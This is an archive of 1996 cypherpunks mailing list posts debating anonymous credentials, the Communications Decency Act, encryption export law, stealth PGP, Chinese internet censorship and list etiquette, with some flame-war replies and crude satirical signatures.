Carol is 25

Carol gets a legitimate anonymous age credential from Alice bound to an 
anonymous public key generated for this purpose.  Carol then gives the 
key pair to Bob.  Bob uses to do things only adults are legally permitted 
to do.  (It's not bound to Carol's everday keypair because that's not 
anonymous....)

What can stop Bob and Carol from subverting a scheme that relies on 
anonymous age creditials in this manner?

If the answer is "nothing" this might mean that purveyors of "adult" 
material might have no defense against a law requiring that they collect a 
True Name + age creditential....

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 16 Feb 1996 18:10:16 +0800
To: stend@grendel.texas.net>
Subject: Re: Spin Control Alert (LI Newsday, 2/12/96)
In-Reply-To: <199602121313.IAA26828@UNiX.asb.com>
Message-ID: <Il8Xma_00YUsMOHkEn@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 14-Feb-96 Re: Spin Control Alert (LI
.. by Sten Drescher@grendel.te 
> DBM> (I assume your Bible argument is just posturing. No
> DBM> U.S. Attorney, political appointees they, ever will prosecute
> DBM> someone who puts the complete text of the King James Bible
> DBM> online.)
>  
>         You assume wrong.  While I certainly agree that no
> U.S. Attorney would voluntarily prosecute such a case, what happens
> when an athiest files charges against someone for carrying the Bible?
> IANAL, but couldn't the U.S. Attorney be forced to prosecute?
> Apparently I'm not the only one who thinks so, since it has been
> reported (on this list by Tim Philp from a Toronto Star article) that
> the Bible has been removed from at least one Web site, presumably due
> to fear of prosecution.

Since you don't understand the way Federal criminal charges work,
there's no reason I should take your argument seriously. (Hint: The
*U.S. Attorney*, or an AUSA, files charges, not you, me, or a random
"athiest.")

As for this mythical Bible being removed, that is irrelevant to this
discussion, which centers around a Bible being *prosecuted*. If I had a
Bible on my web site (perhaps the TCM Vernacular Translation!) I'd
remove it just to make a point. As I suspect the owner of the web pages
did.

Many of us have engaged in lofty rhetoric saying what *could* be
prosecuted -- the Bible, and Catcher in the Rye, and other works of
literature.

Now that the law's passed, let's talk about what *will* be prosecuted.
It will be material that U.S. Attorneys think will get them a
conviction. NAMBLA materials, stories about pedophilia, paraphilia, and
bestiality, and images of hardcore porn -- preferably gay porn -- that
are available to minors.

This law is dangerous because it is so overbroad that prosecutions can
be made exceedingly selectively -- depending on what a US Atty thinks
will offend a jury composed of folks from his area of the country.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Thu, 15 Feb 1996 12:39:14 +0800
To: Decius <decius@montag33.residence.gatech.edu>
Subject: Re: A Cyberspace Independence Refutation
Message-ID: <199602141950.OAA19685@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Decius, 
 
I greatly enjoyed your post on this topic at the cpyherpunks list. 
 
On a related issue, I have been giving a lot of thought to the possibility
of moving the functional aspect of anon servers away from professionally
administered and globally known sites like C2 to many smaller virtually
unknown sites. 
 
I have been informed that the latest Sysquest parallel port 135 Mb drive
lets you boot off of it, (e.g. load the driver off a floppy then boot a new
OS off the Sysquest.) This permits one to put a linux kernal, lots of
utilities, pgp, mixmaster, etc. etc. on the single $20 floppy drive, along
with an easy to use and understand interface for the "sysop." 
 
People can then have a complete mixmaster etc. system regardless of what OS
they use on their regular machine, resident on a floppy easy to hide and
cheap enough to destroy. It would lead to an enormous number of sites
popping up among jr. high school students in the family garage or rec room
through undregrads in their dorm rooms. Access would be mainly through
personal friendships and word of mouth. 
 
Makes it almost infinitely more difficult for government to track them down
let alone clamp down. 
 
--tallpaul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Thu, 15 Feb 1996 17:16:22 +0800
To: cypherpunks@toad.com
Subject: Re: The Emotional Killer (or out of the frying pan and into
Message-ID: <199602141951.OAA19983@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Feb 11, 1996 23:48:29, 'jim bell <jimbell@pacifier.com>' wrote: 
 
 
>At 11:59 PM 2/11/96 -0500, tallpaul wrote: 
>>I want to write on the theme posted to the list in the message below
where 
>>J. Bell wrote "It is their ACTIONS that I feel violate my rights; that is

>>what justifies my seeking their deaths, should I choose to do so."  
>>  
>>First, one thing that marks the sane adult from the child and the
floridly 
>>psychotic adult is the sane adult's knowledge that "feelings" and "facts"

>>are two different things.  
>>  
>>It is one thing to "feel," as J. Bell or all of us might, that our rights

>>have been violated.  
>>  
>>It is another thing to maintain, as J. Bell uniquely appears to do, that 
>>the "feeling" gives him the right to seek another person's death.  
> 
>You're clearly confused. I was responding to an accusation that I was 
>defending seeking somebody's death simply because of a disagreement of 
>OPINION.  My comment was intended to remind the reader that it is the 
>ACTIONS of a person which justify the self-defense; not simply the 
>disagreement. 
 
I disagree and I believe that my quote (reposted by J. Bell) of his
original statement supports me. He mentioned "ACTIONS" and he mentioned
"OPINIONS" but he relied on his "feelings" as the touchstone of reality.
More than ever I believe that he genuinely cannot understand the
difference. He still confuses his "feelings" which exist nowhere but inside
his head with "ACTIONS" which exist outside his head in the real world. 
 
He shows similar confusion as he continued to write. 
 
> 
>You falsely imply that a person can't be correct in his assessment that
his 
>rights were, indeed, violated. 
> 
 
I implied no such thing. If anything, I implied the opposite. Human beings
can assess reality. But they do not do so with "feelings;" they do so with
intellectual reality testing, not emoting. 
 
> 
>>  
>>This and other posts by J. Bell and other lib'bers lead me to believe
that 
>>their claimed interest in human freedom for everyone is little more than
a 
>>cover for a set of authoritarian expectations that they can do whatever 
>>they want, free from any control, responsibility, or accountability.  
> 
>Since you just got through misrepresenting my position, probably 
>intentionally, it's pretty hard to take the rest of your opinions
seriously. 
> 
>>The argued centrality of J. Bell's "feelings" over other people's lives
is 
>>something that puts him in the god category. (Thankfully J. Bell is not
one 
>>of the dreaded tax collectors or "socialist statists.")  
> 
>You're wrong yet again.  Let's see, tallpaul needs a logic lesson: 
> 
>Let's suppose I _believe_ my rights are being violated.  While that, in 
>itself, does not guarantee that this is CORRECT, on the other hand it 
>doesn't mean that it is INCORRECT, either.  You're falsely implying that I

>was ignoring the issue of correctness; I wasn't. 
> 
 
If he was not ignoring "correctness" I neither know nor see where in his
original post he mentioned this. He may wish to give me a "logic lesson"
over the issue of observation, but this also seems lacking in his post. 
 
--tallpaul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Thu, 15 Feb 1996 16:13:54 +0800
To: cypherpunks@toad.com
Subject: Re: PING packets illegal?
In-Reply-To: <199602140355.TAA08824@jobe.shell.portal.com>
Message-ID: <Pine.LNX.3.91.960214151518.212A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 13 Feb 1996 anonymous-remailer@shell.portal.com wrote:
 
> Concerning the ITAR ...... what would happen if some Evil Hacker Dude in,
> say, England, decided to ICMP-ping a host in America? Nothing wrong with
> that ...... but if those ping packets contained little pieces of something
> like PGP ...... would the host being pinged be breaking the law? Would
> all the hosts in the route between that host and the host in England that
> was doing the ping also be breaking the law?

Exporting encryption to the U.S. from another country is not illegal, only
exporting from the U.S. is.  The method of transmissioni is irrelevant.  It
does not matter if TCP packets or ICMP-ping packets are used to transmit the
data. 

However, it has not been decided if all of the hosts in between the source and
the destination are violating the law.  Since it is impossible to monitor the
contents of every packet being transmitted over a network, I seriously doubt
that any intermediate host would be considered to be in violation of ITAR.

- --Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMSJD7rZc+sv5siulAQH7dQP/U2CsagSQYv7opIIU40drvTNXoHeryL0H
Q5KhJczjXJOCulRpuJiXULVpbWA9qYAEJ9vz3+mLs+EEiQ3ge+MxiIYA35wBTI0g
qfZh0qEmZjL5wMb+js2awwOGrsy0NsUsSgsHlbWItZ3/ZVrH7j7oI4LmrUKHNshQ
DmiADuwUlVM=
=cdEk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Thu, 15 Feb 1996 12:19:01 +0800
To: cypherpunks@toad.com
Subject: Re: Subject lines?
In-Reply-To: <v01540b03ad4792ab7c21@[193.239.225.200]>
Message-ID: <Pine.LNX.3.91.960214152111.212B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 14 Feb 1996, Clay Olbon II wrote:

> Ok, has everyone forgotten to use a subject line today, or is there a
> problem with toad.com?  Every message I received today that was dated 14
> Feb (except one - from "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>)
> had no subject and no from line (other than cypherpunks).  This includes
> messages from Perry and Jim Bell.

I think this is a problem with toad.com.  I have seen this happen before.
For some reason, the subject line isn't kept and "owner-cypherpunks@toad.com"
is on the "From:" line instead of the "Sender:" line.

- --Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMSJEurZc+sv5siulAQEM8QP/WspjfhPKgK2LvylNja3/XMEFDZ8WYRNu
Ogfg1QzTiZIww2ww23b7+LJbiT+lRUDv91yBoa+XXL1U+2jDTW6bWoS653yDamVU
c3xmNpHAw6XuG9CH8/fBKCyqqZrBiTswFKDgh71s5AqZW9vMLTojCPz/mbfoUWzU
LUDrQeBfZ7w=
=oYnk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@atlas.ex.ac.uk
Date: Thu, 15 Feb 1996 19:03:29 +0800
To: warlord@mit.edu
Subject: Re: Stealth PGP work
In-Reply-To: <199602140209.VAA03693@toxicwaste.media.mit.edu>
Message-ID: <10100.9602141537@dart.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Derek Atkins <warlord@mit.edu> writes on cpunks:
> > It seems that there a market demand for a stealth-capable product.
> > Many peoples here seems to discuss it.  And for the time being, AFAIK,
> > this type of products are used by a specific class of peoples, most of
> > which knows what 'stealth' means.
> > 
> > So why is it that they design a program that would not permit the use
> > of a feature considered desirable by it's customer base?
> 
> The big question I have for you is, what do you mean by "stealth" PGP?

I presume he means stealth, and the functionality that it provides, as
a filter for pgp versions 2.x.  The question in the minds of users of
this utility (for steganography applications) I think will be will
stealth still work with pgp3.0, and would it useful to include as
built-in functionality for pgp3.0.  I raised this question myself to
the pgp3 development team some time ago, and the reply I got was
essentially that it would still be possible to have as an add-on, so
there was no need to clutter the pgp3 functionality.

Henry Hastur's stealth 1.3 is included with pgp2.6.3i in the
contributions directory...

> Do you want a PGP message which doesn't say to whom it is encrypted?
> Or do you want a PGP message which does not even acknowledge that it
> is a PGP message?  If what you want is the former, then that can fit
> under the PGP API fairly well.  If you want the latter, it will not.

For steganography applications both are required (actually a
transformation formulated by Hal Finney, or an equivalent by Bodo
Moeller is necessary to add more than casual strength to the degree of
plausible deniability due to the fact that the rsa encrypted header
will always be less than the rsa modulus).

I haven't looked at the PGP3 API, but why will a stealth option not
fit?  If stealth can perform the operation as a separate program, why
is it infeasible or difficult for pgp3 to support a stealth option,
and another to support unstealth to a particular recipient.  (With
stealth on decrypt the user provides the user id they think the
message will be addressed to).

On encrypt, the stealth operation should be real easy to implement
inside PGP, it is just another post-filter operation like ascii armor,
stealth instead.

On decrypt, it is more tricky because firstly you loose information
about what kind of data it was, and secondly because you loose the
recipient user id if it was encrypted data.

However, if you provide an API call to unarmor with out decrypting,
and a call to decrypt with out uncompressing, etc then a call to test
for a particular user id on the assumption that it is addressed to
that user id and is an encrypted message would fit in a similar way?

Also note that the rest of the information, once this operation has
suceeded is retained inside the encryption envelope - the length tag,
signature, whether it is further compressed, and so forth.

The stealth operation as implemented in Henry's 1.3 is not all that
secure, and I had an attempt at implementing Hal Finney's algorithm to
produce a stealth 2.0.  My attempts are at:

	http://www.dcs.ex.ac.uk/~aba/stealth/

This is beta code, and I presume the reason that Stale included
stealth 1.3 rather than stealth2.01b with pgp263i was either that 2.01
is beta, or because he did not know it existed.

The reason that the code is beta, is that I had a problem in
implementing stealth as a standalone.  The problem is that Hal's
algorithm has a requirement for cryptographic quality random numbers.
It seems silly to duplicate all this code inside stealth when pgp
provides it internally.  And the (+makerandom=n file) option is not
convenient, because stealth is invoked as a filter with pipes, and
invoking pgp twice doesn't seem like a good idea.  It might even be
dangerous (interferring with the normal sequence of randseed
stirring)?  Besides I had gone to some pains in stealth2.0 to ensure
that nothing hit the disk at all if sufficient memory was available to
do without.

> The reason is that PGP, by definition, is a self-describing packet
> format.  Without that description there is no general way for the PGP
> library to discover what kind of message it is parsing order to
> perform the proper operation to open the message.

stealth allows you to specify encrypt or decrypt, if decrypt the user
id to insert.  It also supports conventional encryption.

> OTOH, if just the keyID is missing, the library will happily try all
> the keys on your secret keyring until one succeeds or they all fail
> (I'm not sure if this is implemented, but it fits quite nicely under
> the API).

That would be a useful functionality from stealths point of view.

> The other question I have is: who do you think the "customers" of PGP
> are?  

He expressed his request in terms of customer demand...

> If you think the majority of PGP's customers are the crypto-privacy
> activitst types, you are highly mistaken.  PGP has hit the main
> stream, and is being used by many non-crypto-aware people.  Probably
> more of them than there are of us.

PGP was started on idealogical grounds, my argument for including
stealth, or as much stealth compatible options as fit within the API
model, is that there are countries where crypto is illegal.  It is not
100% certain that the US won't one day join them (what do you rate the
odds of a mandatory GAK appearing in the US?).  I'd view it as part of
PGP's guerrilla privacy features, and a precaution against such worst
case scenarios.  Besides stego applications have their own set of
uses, albeit they are not in mainstream use in the same way that pgp
is.

> If you want to discuss this more, let's take it to private email,
> please.

I'd prefer to see the discussion on the list, or at least cc me in
such discussion.  Any reason for private email?  The topic is
cryptography related,

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmca@alpha.c2.org (Chris McAuliffe)
Date: Thu, 15 Feb 1996 15:20:55 +0800
To: rsalz@osf.org>
Subject: Re: I've just unsubscribed from cypherpunks
Message-ID: <199602142342.PAA17273@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[To: willer@carolian.com (Steve Willer), Rich Salz <rsalz@osf.org>]
[Subject: Re: I've just unsubscribed from cypherpunks]
[Cc: cypherpunks@toad.com]

willer@carolian.com (Steve Willer) wrote:
>I don't understand what the issue is.

I understand perfectly what the issue is. Rich wrote an important
informational message about "MS CAPI export issue" - which raises
questions about how exactly MicroSloth got away with exporting CAPI. I
for one dearly want to hear the answer. Instead he gets a JimBell rant
about conspiracies or something (I didn't read it to the end).

He CAN'T just killfile the subject. It's HIS subject, and he wants to
read the answer. The thread is relevent. When the noise level exceeds
the threshold, even in threads which you want to read or indeed
initiated, something is fundamentally wrong. I'd unsubscribe myself,
except I can't.

ObCrypto: I think the govmint goofed, letting this out. Perhaps someone
should (anonymousely) alert the DoJ to start a grand jury to indict Bill
Gates. Someone overseas should ASAP interface PGP to it and publish it.

Chris McAuliffe <cmca@alpha.c2.org> (No, not that one.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCUAwUBMSJqPoHskC9sh/+lAQFsuQP2JWma2HNFXSLg5h0pEUn3J/BlEmOu2kBa
avtfvbvLL+25JkTR2Fn3K+zw1b7OyREX1fSj7lKdfRf6WukUJ55snPrqJmaRYeWS
0b7XVAP4bxYNBVV+IjhU+IaZSOE9YY1zuAQ07lSLTmprNiCCQm37loxfyBRiJsrU
VfGxKUXyqA==
=RiJ/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 15 Feb 1996 15:36:13 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Some thoughts on the Chinese Net
Message-ID: <Pine.SUN.3.91.960214163300.4373A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


Several people have posted to the list that the Chinese, censored, 
Internet will fail. Usually, the claim is that the censored network will 
fail mostly because of technical reasons, namely the inability of the 
Chinese government to censor everything. The other significant claim made 
was that the Chinese problem is "behind" the "firewall" leading into the 
country... Suggestions have been made that RSA is involved with China to 
implement this censorship.

I would suggest that the Chinese solution to these problems is singular, 
and simple: the total inability to conduct any transaction anonymously.

How can this occur? It takes two parts; one simple, one somewhat more 
difficult.

The simple portion is a national (Chinese) database associating true 
names with key IDs. These keys will be usable only to sign documents, not 
to encrypt information, similar to the Federal DSS.

The more complex portion (from my perspective, at any rate) is a 
modification of the standard TCP/IP protocol, requiring that each packet 
be signed by its originating user. This would require lots of software 
modification on the Chinese end, as well as a conversion process at the 
National firewall. (This is where the censorship takes place; the 
censors don't filter out unwanted information, they sign acceptable 
information. They then store a reference to the bit of information with a 
hash. If the hash checks out, they don't need to re-sign the data. This 
allows a ramp-up after a while to provide adequate quantities of 
information).

The real question is who's going to design/implement this protocol? The 
answer is Western sofware companies which want to do business in China. 
RSA would obviously be called upon to design the protocol, as well as 
perhaps provide certain implementations of it. Another likely candidate 
is Microsoft, whose Windows OS has been declared a National Standard by 
China. It would hold obvious financial benifits for MS to develop a 
Chinese TCP/IP protocol for Windows. Any company which wants a monopoly 
in a country of > 1 billion people could probably get in on this deal.

Now that all information has a recognizable source, dissidents in China 
can be arrested, and unacceptable information never makes it into the 
country.

Can anybody say why this can't be implemented? Or why China wouldn't 
implement it?

This is obviously a worst-case scenario, but one which appears, at least 
to me, to be technically feasable.

I'd love to hear otherwise.
Jon Lasser
----------
Jon Lasser (410)494-3072                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: willer@carolian.com (Steve Willer)
Date: Fri, 16 Feb 1996 18:09:30 +0800
To: Rich Salz <rsalz@osf.org>
Subject: Re: I've just unsubscribed from cypherpunks
In-Reply-To: <9602141233.AA00418@sulphur.osf.org>
Message-ID: <312217ee.180250526@saturn>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 14 Feb 1996 07:33:29 -0500, you wrote:

>Normally, when people post notices proclaiming "Jim, I'm putting you in
>my killfile" or "I can't take it, you've ruined this list, I'm leaving!"
>I think it's among the worst kind of petty egotism.

I don't understand what the issue is. I used to use procmail for my
filtering, and it worked fine with Pine (although it would have been
nice to thread my mailing lists). Now, I use Forte's Agent, which
gives me a newsgroup-like access to mail folders _and_ auto-filtering.
So I have no problem with the mailing list -- if I want to ignore a
thread, I just don't look at it. I also filter out all subscribe and
unsubscribe requests into a "Bozos" mailing list, and I can easily
ignore "I'm leaving" style messages by not looking at them and letting
them go away on the next purge.

If you don't know how to use the right tools, or you are not able to,
or you aren't willing to, I fail to see how the members of the list
are at fault. The people at fault are, respectively, you, your
employer, and you.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Franklin Reynolds <fdr@osf.org>
Date: Thu, 15 Feb 1996 13:53:24 +0800
To: cypherpunks@toad.com
Subject: Re: Linux on the Mac
Message-ID: <199602142221.RAA11704@postman.osf.org>
MIME-Version: 1.0
Content-Type: text/plain



>From: cjs@netcom.com (cjs)
>To: olbon@dynetics.com (Clay Olbon II)
>Cc: cypherpunks@toad.com
>Subject: Re: Linux on the Mac
>Date: Wed, 14 Feb 1996 07:26:42 -0800 (PST)
>Content-Type: text/plain; charset=US-ASCII
>Content-Transfer-Encoding: 7bit
>
>> In the latest PowerPC news it is reported that OSF is porting Linux
>> to the Mac with the support of Apple.  Apple has a web site -
>> www.mklinux.apple.com that discusses this and has a link to the OSF
>> site.  In my book, this is a GoodThing(tm).  Of course, being a huge
>> fan of both the Mac and unix might put me in the minority ;-)
>
>They aren't *really* porting Linux to powermac. They're throwing a
>little bit of paint on OSF/1 and hiding some stuff in libc.
>
>Looks to me like they are basicly trying to ca$h in on the Linux name
>and reputation without contributing anything to the cause.
>
>I personally think that Linux International (they still around?)
>should put out a counter press-release informing the public that the
>Apple/OSF Linux shares only the name.
>
>Christopher

*Sigh*

OSF ported Linux to our microkernel which is derived from Mach 3.0
from CMU. And we have ported our kernel and the Linux server to
PPC. Of course some of the functionality that is in Linux was replaced
with micro-kernel functionality. That was the point. The Linux server
implements the higher level OS functionality like the file system,
process management, networking, signals, etc. The paper presented at
the Conference on Freely Distributable Software describes some of the
technical details.

We have also ported OSF/1 to our microkernel. Both servers are layered
on top of the same microkernel. Perhaps you are confusing the
microkernel with the OSF/1 server?  Anyway, you don't have to worry
about getting any OSF/1 code. OSF/1 is licensed software. It is
illegal to distribute it freely.

Franklin Reynolds
Open Software Foundation    |   phone # 617-621-7321 
11 Cambridge Center	    |   fax # 617-621-8696
Cambridge, MA 02142         |   fdr@osf.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 15 Feb 1996 17:17:03 +0800
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: secure web page ideas
In-Reply-To: <Pine.SUN.3.91.960214122949.19989A-100000@rwd.goucher.edu>
Message-ID: <Pine.ULT.3.91.960214172007.16136L-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 14 Feb 1996, Jon Lasser wrote:

> For those people who have Netscape / an SSL-enabled web-browser, wouldn't 
> it be useful to have secure web pages that did the following:
> ...
> (3) Ultimately, a server that did (2), through (1).  Being able to send PGP
>     encrypted email to a recipient through anonymous remailers, over the web
>     with a secure browser might be PGP's "killer app" in one way or another.
>
> How hard would this be to implement? Would it be worth waiting until the PGP 
> 3.0 API is released?

At first I wondered why you'd want to send encrypted mail you couldn't 
sign with your own key, but on second thought, I can think of a lot of 
reasons.

I'd think that much of the hard and unique work would be, first, proper
interface design, and second, putting together an efficient database and
database extraction mechanism for huge key rings (I notice that the MIT
keyserver was recently upgraded; talk to them). While the PGP 3.0 API
would help with the implementation, I see no reason to wait on these
infrastructure steps.  The final version would use the more secure and
efficient API, but quick modular hacks for steps that would be fulfilled
by the API should be all that is needed. 

If you put together a proof-of-concept model, even one that doesn't 
really work, I think you'd see this idea take off. I see no reason to 
wait, and while I'm certainly no CODERpunk, I'd be more than happy to 
play with user interface mockups in my copious free time... 

-rich
 Institute for Ernst Zundel Revisionism
 http://36.190.0.210/~llurch/Not_By_Me_Not_My_Views/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 16 Feb 1996 21:43:46 +0800
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: Some thoughts on the Chinese Net
In-Reply-To: <Pine.SUN.3.91.960214163300.4373A-100000@rwd.goucher.edu>
Message-ID: <199602142238.RAA24705@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jon Lasser writes:
> The more complex portion (from my perspective, at any rate) is a 
> modification of the standard TCP/IP protocol, requiring that each packet 
> be signed by its originating user. This would require lots of software 
> modification on the Chinese end, as well as a conversion process at the 
> National firewall.

They could use no stock software, and they would grind every machine
in the country to its knees doing the signatures. RSA signatures
aren't cheap.

Furthermore, you couldn't check the signatures at the other end fast
enough and it would probably be easy enough to steal keys. I doubt
this would fix their problem.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 16 Feb 1996 06:08:28 +0800
To: cypherpunks@toad.com
Subject: sameer's lawsuit??
Message-ID: <199602150153.RAA03348@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Some entity calling itself Sameer may have said:

> 	One of my ex-users who is now suing me has posted to
> alt.anonymous. You might want to read about it. Look for the subject
> "THE FACTS ON COMMUNITY CONEXION"
> 	(this guy is a wellknown spammer)

Could someone forward this post to cypherpunks? I can't get ahold of a 
reliable newsserver ......

Thanks,

Micahel Ellis
<mellis@alpha.c2.org>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSKE2Qqs/Oe38tFJAQG8nwP/RCqIfKZrSXfhgsGBG+P61fBvzzXM6fdR
QmRtA/xYcxTUW7TZmjvsvQAnpUQYSpywB84FFUhHB7w8cdxJBZVHg53tYyuDuAHU
q4InJbbS+9AsFeoCGspy7ADqn4DU8gmLpIZ6mxGb37hBav10xlVYaUm7IyYjej+Z
WWSakPnjcVk=
=W2v0
-----END PGP SIGNATURE-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken D Hayes <kdhayes@earthlink.net>
Date: Thu, 15 Feb 1996 17:52:47 +0800
To: cypherpunks@toad.com
Subject: Re: FCPUNX:Beta Testers Wanted
Message-ID: <199602150223.SAA09056@iceland.it.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:28 AM 2/12/96 -0500, you wrote:
>
>

>> Please let me beta test the new puffer!  I just started using it. Its great!
>> I know next to nothing about crypto and am using Windows 3.1, but puffer
>> provides me with easy access to file security.  
>> 
>> Ken Hayes
>> 
>> KDHayes@earthnet.net
>> >
>> >
>> 
>> >
>> >
>> Ken Hayes (KDHayes@Earthlink.net): Veiws expressed represent only my own.
>> 
>> 
>
>==========================================================================
> + ^ + |  Ray Arachelian |Emptiness is loneliness, and loneliness|  _ |>
>  \|/  |sunder@dorsai.org|is cleanliness  and cleanliness is god-|  \ |
><--+-->|                 |liness and god is empty,  just like me,|   \|
>  /|\  |    Just Say     |intoxicated  with the maddness,  I'm in|   <|\
> + v + | "No" to the NSA!|love with my sadness.   (Pumpkins/Zero)|   <| n
>===================http://www.dorsai.org/~sunder/=========================
>
>
>[This Bible excerpt awaiting review under the Communications Decency Act]
>And then Lot said, "I have some mighty fine young virgin daughters. Why
>don't you boys just come on in and do em right here in my house - I'll just
>watch!"....Later, up in the mountains, the younger daughter said. "Dad's
>getting old. I say we should do him." So the two daughters got him drunk and
>did him all that night. Sure enough, Dad got em pregnant....Onan really
>hated the idea of doing his brother's wife and getting her pregnant while
>his brother got all the credit, so he whacked off first....Remember, it's
>not a good idea to have sex with your sister, your brother, your parents,
>your pet dog, or the farm animals. [excerpts from the Old Testament, Modern
>Vernacular Translation, TCM, 1996] 
>
>
>
>
Ken Hayes (KDHayes@Earthlink.net): Veiws expressed represent only my own.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 15 Feb 1996 20:03:01 +0800
To: lunaslide@loop.com
Subject: Re: True democracy the electronic way
In-Reply-To: <v01530500ad47100dc99b@[204.179.169.44]>
Message-ID: <199602150303.TAA21304@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>I too would like to see a purely democratic process rather than a
>representative one.  And I also agree that it won't happen soon.  The
>question is, what do we keep of govt?
>
>How would the group propose electronic voting on legislation should
>proceed?  What sort of technical solution could be arrived at to allow
>everyone in the country to vote on specific legislation and how would they
>get access to that legislation?  I think _this_ is a cypherpunk topic for
>sure.

two quick comments:

1. this is an extremely interesting problem in my opinion. the ideal
form of government has not been achieved in many millenia. could it
be solved given the full power of the information age, i.e. 
an apex in intellect and technology? personally I think a very
efficient form of government can be created. its a problem with
very little true "research" behind it in one sense (I mean, how much
thought goes into the creation of the average government? perhaps 
a lot of thought, but how much of it is backed by good understanding of
consequences of various choices?).  on the other hand, it is a problem
in which research has been ongoing for centuries. 

if anyone knows of
a mailing list to discuss this concept of trying to apply technology
to government, I would be most interested. the closest I can see
right now is groupware software, which I have repeatedly predicted
here is going to go ballistic as far as development some near date
in the future (esp. with high speed networks).

2. the mouth-foaming libertarians here hate discussions about
democracy. TCM repeatedly advocates total withdrawal as the "solution".
the basic belief is that government shouldn't matter. "if it doesn't
matter, we're right, if it does matter, then there's nothing we can do about
it" I saw paraphrased here once. the nihilism associated with the 
attitude that people always move toward the evil side of the morality
spectrum, such that the majority is always a tyrannical cabal, is
strong here. so if you want to get some serious discussion on this
matter, maybe you can find another mailing list where the mere basic
premises are not going to elicit dirty looks.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 15 Feb 1996 16:53:27 +0800
To: cypherpunks@toad.com
Subject: Re: Response to Perrygram
Message-ID: <v02120d03ad48178a4ddf@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



>And why don't you stop cluttering up the list with supposedly cute stuff
>like this?


<Forgot the number one rule of domestic violence. Don't ever try to get
between the participants and get them to calm down unless you're wearing
your Kevlar Y-fronts.>

It seems it must be time to up my Ritalin dose. I will refrain such patent
copralalia in the future. If I can restrain myself.

I most abjectly beg your forgiveness for violating the pristine discourse
of this most august e-mail list.

Cheers,
Bob Hettinga

<Yeah, right. Feh!>


-----------------
Robert Hettinga (rah@shipwright.com)
